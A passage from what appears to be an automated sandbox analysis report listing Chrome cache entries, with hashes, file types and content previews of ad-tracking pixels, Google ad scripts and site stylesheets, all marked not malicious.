Preview:	{"sodar_query_id":"PsojZ8G2FfTox_AP4MSRQQ","injector_basename":"sodar2","bg_hash_basename":"LKNVTCBmm8LONMAFh4vZaTIkTKvrw9NCcGbGJBxbjE8","bg_binary":"flRD2H11c0uVfMczVq61MImSUxdCl1ciaOMh9tPBSIqhAodwgxa4xTdeovbjeZfnMlTaoHu9LvoTa+sPNenq6835kLuUWDUHNrqg5WdUJPooGtCxH7RJsykFc1/GQS+IcMp4jLvCfrAg7CTw9fb/yEEiKrP46Ccv8CyuTx2P3dZNT3jPqkxkjVB7yPYpg4eFe+WGmCMQ6Ca0X+OCYBeMVRxUy2kL5iXBuWv99XEQvJfpDrkXwaSAysYfuDDUuVR5srt76kqGl0z0AUSy0MYL2tIXnKcCofIaHmn4LFXP4GxFBBhPrRyJQq1iqew5jjeyTBcYwDvpLPlL2k/CQFNDfzRyDwOLdLFweKEA834yqVFWTSeF8DGpjITXUm+y6R2pE8xXOZa+R7thisVc/nZEgKXm762UVRCizqAw2EKqZq9xzlEx0hkbary/lgbqe4T6DT2saLOuZnZ9ITBSVgcp7Fz5XX/KoTcweV7V+sZWFYcRMyA5g8RiluUtHIK6R1A9DJT/AGQiR2MscdOgKnYIwS+q+7BARoGabTr3KjAs67feu+mgV4h3BDv3hMtgFljEXd3PNsyaMa3i+UW6cPoF9eRGdQogCIy9L+e4y+3j05cPsexXfh0Fen/l/2/Zfp0puaZxjyofAwfkh8uRC6AeLPH27WlrbXSr5ywHOxgxK29xLEKGAI/oPFSf+elBR3giiV8e43FymsVD7Ueucam2E5yXkLrFkrOJQIb7HA7oFURG/CNY0eUNl2akKMhIvumGPLdZFqC0l55vg4K0gPsYJELQs6Af5BpuJDu67gsL7Krm1xwBPomKOxgjXaD5a/zsSNp9jKLCd2Ha7LqmwR

Chrome Cache Entry: 398

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=adkernel&google_hm=QTg4MzY5Nzg4Njc3OTM0Mzg0NjY&google_push=AXcoOmTePKwToHaeIQGu8M56gWDzY-1geiWnlUHfQIpsbYld60Ki_rzZaP9OaIWvTKZwgr332ljGgxcxDcFPggPWRaGld0nzhuAzAeO9
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 399

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=baidu_mediago&google_push=AXcoOmQzdVcA5PSUWiPvj9qwcPXZXVb8HNbTivNbTzQifDQck24kFKR7TStxtgxFXn-j4k3gshyw_znnZgyV57zTXchMvGa5P0ZnjS-k9g&google_hm=22210ca75dc45a302agr4j00m2xmr4i5
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 400

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3533)
Category:	downloaded
Size (bytes):	226660
Entropy (8bit):	5.451557875371089
Encrypted:	false
SSDEEP:	6144:BFufmdIbWdPP9g+iC+2OSKI4p/hpkWI4jchv:aedIeeScwv
MD5:	B8F73CA15B82A59E06E0AFD7AFD4732B
SHA1:	785735EE29AE9815BE63D99530439F698CE08EB9
SHA-256:	0661EECDC8F9A86CBEAB346D02D85524CFAD9FA7E159EB9B10BDF5F58FFE86F1
SHA-512:	4C026E1E1DDB622F4578BFEE979FECE8CA2FABE9AD13CD3CDF983B8975EE91339415F73076DBC6407C64CA0B801EA0C18605BE783B30C27212E8AD92E553164F
Malicious:	false
Reputation:	unknown
URL:	https://pagead2.googlesyndication.com/pagead/managed/js/activeview/current/ufs_web_display.js
Preview:	(function(){var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");},da=.ca(this),p=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.p("Symbol",function(a){if(a)return a;var b=function(f,g){this.Jg=f;ba(this,"description",{configurable:!0,writable:!0,value:g})};b.prototype.toString=function(){return this.Jg};var c="jscomp_symbol_"+(Math.random()*1E9>>>0)+"_",d=0,e=function(f){if(this instanceof e

Chrome Cache Entry: 401

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2586)
Category:	downloaded
Size (bytes):	22560
Entropy (8bit):	5.532870375696404
Encrypted:	false
SSDEEP:	384:4qopQl6FtO53n+8svyfxNFo5oeHvVFBIuwRatEDTJi/EDdBC6ZcuLI4Xhw/XgsB6:4qopQlwOFn+DiFoeeFqYt2TJisnC6ZcU
MD5:	975743BD0AB761EBED37DFDA7FE934E0
SHA1:	2F2F01248ABA0638DCACEA2081888CF598960991
SHA-256:	13F3174A49C97770522994A73451F71E77FDE2DC0E3DD7F965E73929C018888D
SHA-512:	D4B8D5AA631568F43546D82324DF07B6F33112FF7A0DF1930904B2773BD7B478A05720C5CB39AB52B396559C3C8D65BC5FAB2065067DC2DBC9B72245D8ABB495
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/qs_click_protection_fy2021.js
Preview:	(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var n=this\|\|self;function ea(a,b,c){return a.call.apply(a.bind,arguments)}function p(a,b,c){p=ea;return p.apply(null,arguments)}function fa(a,b){function c(){}c.pr

Chrome Cache Entry: 402

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 403

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
URL:	https://cm.g.doubleclick.net/pixel?google_nid=whaleco_services_llc&google_push=AXcoOmSwaAEJs2KOmCEYVvFDTykRMfzP5EgxESu2Kp_CNP1qYCwsJSzte81WmXDP9HOJ6CmStE9CMEmJ5PqfvDw16JSgB3T_dmeec4Dc4Q
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 404

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (608)
Category:	downloaded
Size (bytes):	823
Entropy (8bit):	5.079251934712805
Encrypted:	false
SSDEEP:	24:e0vPioGlUrd033xLpxghnd0sH3xtpx2hnd0sQ3rpAhY:dvPioG+d7DDSDDjO
MD5:	8972AE5004BC634FFA6641BE3960E78A
SHA1:	235AECDFE4A45217D75FE7ABFBB5B12E3B28CC6E
SHA-256:	7F264C31CDB355F351235359240C30ACAE2BBE0A43C73FA6A035123E6D953A01
SHA-512:	F2CD81DC263916A1B47FDBCC58055BA4D3DB4C98FA9E9088776D695457B7BC974F3DFD217389A3E86FED0046313649D3626467AE63502967698406DDA4CFE3C5
Malicious:	false
Reputation:	unknown
URL:	https://ka-f.fontawesome.com/releases/v6.6.0/css/free-v5-font-face.min.css?token=8ce76d2187
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */@font-face{font-family:"Font Awesome 5 Brands";font-display:block;font-weight:400;src:url(../webfonts/free-fa-brands-400.woff2) format("woff2"),url(../webfonts/free-fa-brands-400.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:900;src:url(../webfonts/free-fa-solid-900.woff2) format("woff2"),url(../webfonts/free-fa-solid-900.ttf) format("truetype")}@font-face{font-family:"Font Awesome 5 Free";font-display:block;font-weight:400;src:url(../webfonts/free-fa-regular-400.woff2) format("woff2"),url(../webfonts/free-fa-regular-400.ttf) format("truetype")}

Chrome Cache Entry: 405

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2735)
Category:	downloaded
Size (bytes):	24842
Entropy (8bit):	5.536285587605039
Encrypted:	false
SSDEEP:	768:n7xrC/PnLU3EEz0d0Pe49cg/8USqro7Zii4kTIKaJmmUQeG:s7w1pEcK1GmtG
MD5:	C1BE04166BF406D39CBDF416DBC727EB
SHA1:	5160F6ACF663F376BFB6CD1CAA38F18BA43E8C8A
SHA-256:	C584101707A4CBEB1449B2CACB97E75453B6A9CBFF4795B8A6CD89DD555A639D
SHA-512:	00A987E8621869C7063E6AD44E290AFA6C50E24640280938172D20BC19B44B543D6FA150C707EE487F69DD9A197C3F328B8E8765EA60BB147E430CAD97C49D5D
Malicious:	false
Reputation:	unknown
URL:	https://www.gstatic.com/mysidia/c1be04166bf406d39cbdf416dbc727eb.js?tag=addon/exit
Preview:	(function(){'use strict';/.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var q=this\|\|self;function aa(a){q.setTimeout(()=>{throw a;},0)};var ba,ca;a:{for(var da=["CLOSURE_FLAGS"],ea=q,fa=0;fa<da.length;fa++)if(ea=ea[da[fa]],ea==null){ca=null;break a}ca=ea}var ha=ca&&ca[610401301];ba=ha!=null?ha:!1;var r;const ia=q.navigator;r=ia?ia.userAgentData\|\|null:null;function ka(a){return ba?r?r.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function y(a){var b;a:{if(b=q.navigator)if(b=b.userAgent)break a;b=""}return b.indexOf(a)!=-1};function A(){return ba?!!r&&r.brands.length>0:!1}function la(){return A()?ka("Chromium"):(y("Chrome")\|\|y("CriOS"))&&!(A()?0:y("Edge"))\|\|y("Silk")};function ma(a){ma[" "](a);return a}ma[" "]=function(){};!y("Android")\|\|la();la();y("Safari")&&(la()\|\|(A()?0:y("Coast"))\|\|(A()?0:y("Opera"))\|\|(A()?0:y("Edge"))\|\|(A()?ka("Microsoft Edge"):y("Edg/"))\|\|A()&&ka("Opera"));let na;function pa(){const a=Error();a.__closure__error__context__

Chrome Cache Entry: 406

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65321)
Category:	dropped
Size (bytes):	96614
Entropy (8bit):	4.750153610655337
Encrypted:	false
SSDEEP:	1536:EKM1MvMaMfMRQA709/bQZMfjSFOlyPG9zXgRw0D:Z709/UGGFwyPG9zwRw0D
MD5:	4CA760F49CD8A14911C81E6C14328874
SHA1:	81687E7A5DBBA470120798CF05DC31E8D57F0B11
SHA-256:	F99C17690330C805C47DA3D7592864D6ACF0F73817D432447E1B0C66AD28F221
SHA-512:	BC14B089615EC40F6B031631CA36D75FC55267117BBD7D6DFBE21821DA288E56F2FBDCE920B9984D82D80067C153A8EC43CC664D40853298CF248C0F0F4A278C
Malicious:	false
Reputation:	unknown
Preview:	/!. Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2024 Fonticons, Inc.. */.fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-classic,.fa-regular,.fa-sharp-solid,.fa-solid,.fab,.far,.fas{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-classic,.fa-regular,.fa-solid,.far,.fas{font-family:"Font Awesome 6 Free"}.fa-brands,.fab{font-family:"Font Awesome 6 Brands"}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;

Chrome Cache Entry: 407

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	170
Entropy (8bit):	5.335916817166796
Encrypted:	false
SSDEEP:	3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
MD5:	E7673C60AF825466F83D46DA72CA1635
SHA1:	FC0FCBEE0835709BA2D28798A612BFD687903FB5
SHA-256:	0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
SHA-512:	F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..

Chrome Cache Entry: 408

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (4158)
Category:	dropped
Size (bytes):	182435
Entropy (8bit):	5.501602925310034
Encrypted:	false
SSDEEP:	3072:jbtEWyenHYGwdwCrDTdS4bp41p2nF58Ni1YtFrD1XgQqnbZfahtFJz1m2MDIV0Mx:jbtEWyenHYGwdwCrDTdS4bu1pWFONi1o
MD5:	592C082F9667FD3FC463580773BB333C
SHA1:	FE67449D8A5D2538A5DC8B747F8D6E39ACB2FAF2
SHA-256:	986DFDC2747265FF6B5B813A9EDC284183C072A3ACCE77908EE87F23A0F96442
SHA-512:	5EBEB95780E55BE2C1585734E4A6DAFC8296F3A9BC843389EDAF371BD93F32A2F266CB0E39D39766CEC81B60A01AC99FA52B3C5A584A0D4049CCD0A445B49569
Malicious:	false
Reputation:	unknown
Preview:	(function(sttc){'use strict';var r,aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} .var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c\|\|a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"

Chrome Cache Entry: 409

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
Category:	dropped
Size (bytes):	205
Entropy (8bit):	6.471232950817362
Encrypted:	false
SSDEEP:	6:6v/lhPmvbPM6ArwrgPowQka3cQhWb8i4NI1Q/2up:6v/7OvzZ6IRwIcQEb7461Q2c
MD5:	4087858E2C9DB9AA8F6A840AEDCFB533
SHA1:	D1FFE861DA6BD0E95FD1A365B0C3D3CEB6CD58A3
SHA-256:	4D45982F2DC34F36C9045EE46A75A1943666BB7FD64E103CAC8C7429E7012840
SHA-512:	541228667C513266FFAC017AA43CCACEA410E20BF27D30599276E9984FAC2C433AC58288C19F7A5BFEB1C9B4074B8C9C472080BF1C706303F97B2CE73DBD634F
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...0...0.......1.....IDATx...1..1.DQ.f....@H.....%`..j.M&"....5....;...;.......\.....\..U.4..pe.<.P.....%... ...@....p.....@...X...5..{.$.x^....y=..z.......\|.......+.........IEND.B`.

Chrome Cache Entry: 410

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	6700
Entropy (8bit):	4.74747595797438
Encrypted:	false
SSDEEP:	192:6qxZhx9TzCe3kUuBiM8YlHB54d/fjlWtl81jlxBCZSP8tCZSsn4hy8rCZSajtb+C:VzeylfJWXQJQG
MD5:	8213CE080BB8B0EB6D4AF2056C995904
SHA1:	0BE7A3116BCA346A6BFD490562E5898BE5A000FA
SHA-256:	AB45CB97B8ED0A9435ED359F32FCA9FE62B28511723E025DF9073800DA64D69D
SHA-512:	78BF3BA3A1098C97B038813B8CEDCEDB8C53051A62468E4643591B2DD31EB28F88B6BD7F80D7DB3C0030C74396029F567DA386BA59DA5E3B2CFDEEC3F4C90FAB
Malicious:	false
Reputation:	unknown
URL:	https://trksyln.net/resources/css/navbar.css
Preview:	.hamburger {.. display: inline-block;.. cursor: pointer;.. -webkit-transition-property: opacity, -webkit-filter;.. transition-property: opacity, -webkit-filter;.. transition-property: opacity, filter;.. transition-property: opacity, filter, -webkit-filter;.. -webkit-transition-duration: 0.9s;.. transition-duration: 0.9s;.. -webkit-transition-timing-function: linear;.. transition-timing-function: linear;.. font: inherit;.. color: inherit;.. text-transform: none;.. background-color: transparent;.. border: 0;.. margin: 0;.. visibility: hidden;.. overflow: visible;.. }.. .. .hamburger:hover {.. opacity: 0.7;.. }.. .. .hamburger-box {.. width: 30px;.. height: 21px;.. display: inline-block;.. position: relative;.. }.. .. .hamburger-inner {.. display: block;.. top: 50%;.. margin-top: -1.5px;.. }.. .. .hamburger-inner, .hamburger-inner::before, .hamburger-inner::after {.. width: 30px;

Chrome Cache Entry: 411

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (16325)
Category:	dropped
Size (bytes):	421812
Entropy (8bit):	5.63731351559356
Encrypted:	false
SSDEEP:	6144:O4RGTFh5GLgB40osAzWRSR9cM8rT/r2+GUZ9Or24Avl:XRiFh6c40os6WGmYC
MD5:	F39A5324D3715E7762645754E5A2705E
SHA1:	5B5C860A3748B11BCD558CAFA60AA48DC5DBB943
SHA-256:	D47C3EFC527387989B0F1112C1D22C41AC783C10B41A19801E31F9FCCD04157E
SHA-512:	C34626F2E6E0D8545A99DA0793A26F74978443AF4071088C5C314629B254E70718259EB57176AE2009ABB87BFB4F9318D77F304CEC6C35B0AD0D85BCE79AEF97
Malicious:	false
Reputation:	unknown
Preview:	.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",

Chrome Cache Entry: 412

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65536), with no line terminators
Category:	downloaded
Size (bytes):	130624
Entropy (8bit):	6.037733545935196
Encrypted:	false
SSDEEP:	1536:/JGqVFSVOgdwVY7QzNNNb82bOcBXYZLSmIUVCC5xXdlMfsjSrODcbUMvL+7ILPc9:A2FSV3dwVLzNLZacBXYSEdSkdMTFPc9
MD5:	91AFFD702EDD7FABCD87337760221D13
SHA1:	E5C86CE10FB774AB5CB064DAD635706E8A655EB2
SHA-256:	8924C0C2F8B3CF4C9EB86B30E69603F911F9BD9BC5C510DEE9D629D998C125E4
SHA-512:	643596B3238C489BCD83CB6F42F182F0C23FE6E24E799BDBE2A0BBF372435CE462EE62B2896BCD0C653739B35C1B164AC4B091D66500941F2D6F697EFD83E4C8
Malicious:	false
Reputation:	unknown
URL:	https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-9495854422341365&output=html&h=280&slotname=8126112816&adk=1512438383&adf=2237897472&pi=t.ma~as.8126112816&w=930&abgtt=6&fwrn=4&fwrnh=100&lmt=1730398767&rafmt=1&format=930x280&url=https%3A%2F%2Ftrksyln.net%2FError&fwr=0&fwrattr=true&rpe=1&resp_fmts=3&wgl=1&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1730398765252&bpp=5&bdt=3903&idt=2057&shv=r20241028&mjsv=m202410240101&ptt=9&saldr=aa&abxe=1&cookie_enabled=1&eoidce=1&prev_fmts=0x0%2C930x465&nras=1&correlator=5363632696827&frm=20&pv=1&u_tz=-240&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=44&ady=1788&biw=1017&bih=870&scr_x=0&scr_y=0&eid=44759876%2C44759927%2C31088482%2C95344187%2C95335245%2C95345472%2C95345789%2C95345963%2C95345966&oid=2&pvsid=2973902258960805&tmod=55193809&uas=0&nvt=1&ref=https%3A%2F%2Ftrksyln.net%2Ftgmacro%2Fdownload&fc=1920&brdim=10%2C10%2C10%2C10%2C1280%2C0%2C1050%2C964%2C1034%2C870&vis=1&rsz=%7C%7CeEbr%7C&abl=CS&pfx=0&fu=128&bc=31&bz=1.02&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=3&uci=a!3&btvi=2&fsb=1&dtd=2061
Preview:	<!doctype html><html><head><script>var jscVersion = 'r20241028';</script><script>var google_casm=[];</script><style>a { color: #000000 }.img_ad:hover {-webkit-filter: brightness(120%)}</style><script></script><script>window.dicnf = {imprtype: 2,};</script><script data-jc="40" data-jc-version="r20241028" data-jc-flags="["x%278446'9efotm(&20067;>8&>`dopb/%<1732261!=\|vqc)!7201061?'9efotm(&20723;>:&>`dopb/%<1245;05!=nehu`/!361:<320!9sqrm(&2057?61<&>`dopb~"]">(function(){'use strict';/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var q=this\|\|self;function aa(a,b){a:{var c=["CLOSURE_FLAGS"];for(var d=q,f=0;f<c.length;f++)if(d=d[c[f]],d==null){c=null;break a}c=d}a=c&&c[a];return a!=null?a:b};function ba(a){q.setTimeout(()=>{throw a;},0)};var ca=aa(610401301,!1),da=aa(653718497,aa(1,!0));var t;const fa=q.navigator;t=fa?fa.userAgentData\|\|null:null;function ha(a){return ca?t?t.brands.some(({br

Chrome Cache Entry: 413

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1055)
Category:	downloaded
Size (bytes):	2690
Entropy (8bit):	5.39866636776827
Encrypted:	false
SSDEEP:	48:Otg7xBqHIN7QaE9Fa9FZpPiNmgrZyHicju8m5I0zRHkFRCmTx:fN7Qabhiwdicju8WhRHMnTx
MD5:	76A4D84DE75340D59CA06503A14184D4
SHA1:	2FE3C4A95AF88BE57D1912BB09DC463F69924402
SHA-256:	66E9BF446316F6EEC5EAEFA7098592BBD2144A60EB38C481DB233A6CA8B8D94A
SHA-512:	2ABE6C816B265B72A8023E8F832B9BED0FFD2C931BA07C5DA1AE0CB5D60178CBD1CEA9CE6AE0BB88F77614954C20836342AD6BAFE25EB1CA4D2AEB495E4E2BD2
Malicious:	false
Reputation:	unknown
URL:	https://tpc.googlesyndication.com/pagead/js/r20241028/r20110914/client/window_focus_fy2021.js
